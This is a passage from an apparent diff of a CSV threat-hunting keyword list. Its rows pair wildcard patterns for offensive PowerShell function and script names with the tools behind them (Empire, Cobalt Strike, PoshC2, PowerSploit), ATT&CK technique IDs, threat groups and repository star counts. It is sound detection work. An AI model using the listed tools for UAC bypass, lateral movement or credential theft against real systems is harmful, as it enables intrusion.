T1069.001 - T1069.002 
- T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","812","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" -"*Invoke-EnvBypass.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1125","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-EnumerateLocalAdmin*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-EnumerateLocalAdmin*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Invoke-EnvBypass*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-BypassUACTokenManipulation.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-EnvBypass.*","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 
- T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","813","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" +"*Invoke-EnvBypass.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1125","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-EssessAgress*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" -"*invoke-eternalblue*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - 
T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*Invoke-EventHunter*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*invoke-eternalblue*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Invoke-EventHunter*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*invoke-eventhunter*","offensive_tool_keyword","pywerview","A partial Python rewriting of PowerSploit PowerView","T1069.002 - T1018 - T1087.001 - T1033 - T1069.001 - T1087.002 - T1016 - T1482","TA0007 - TA0009","N/A","N/A","Reconnaissance","https://github.com/the-useless-one/pywerview","1","1","N/A","N/A","8","738","102","2023-10-02T14:57:20Z","2016-07-06T13:25:09Z" "*Invoke-EventViewer *.exe*","offensive_tool_keyword","EventViewer-UACBypass","RCE through Unsafe .Net Deserialization in Windows Event Viewer which leads to UAC bypass","T1078.004 - T1216 - T1068","TA0004 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CsEnox/EventViewer-UACBypass","1","1","N/A","10","2","108","21","2022-04-29T09:42:37Z","2022-04-27T12:56:59Z" "*Invoke-EventViewer.ps1*","offensive_tool_keyword","EventViewer-UACBypass","RCE through Unsafe .Net Deserialization in Windows Event Viewer which leads to UAC bypass","T1078.004 - T1216 - T1068","TA0004 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CsEnox/EventViewer-UACBypass","1","1","N/A","10","2","108","21","2022-04-29T09:42:37Z","2022-04-27T12:56:59Z" -"*Invoke-EventVwrBypass*","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - 
T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","812","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" -"*Invoke-EventVwrBypass*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-EventVwrBypass.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-ExecuteMSBuild*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-ExecuteMSBuild.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-ExecuteMSBuild.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1090","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-ExploitableLeakedHandlesCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*Invoke-Eyewitness*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" 
-"*Invoke-FakeLogonScreen*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-Farmer*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-EventVwrBypass*","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","813","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" +"*Invoke-EventVwrBypass*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-EventVwrBypass.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-ExecuteMSBuild*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-ExecuteMSBuild.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-ExecuteMSBuild.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1090","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-ExploitableLeakedHandlesCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-Eyewitness*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" 
+"*Invoke-FakeLogonScreen*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-Farmer*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" "*invokefilefinder*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 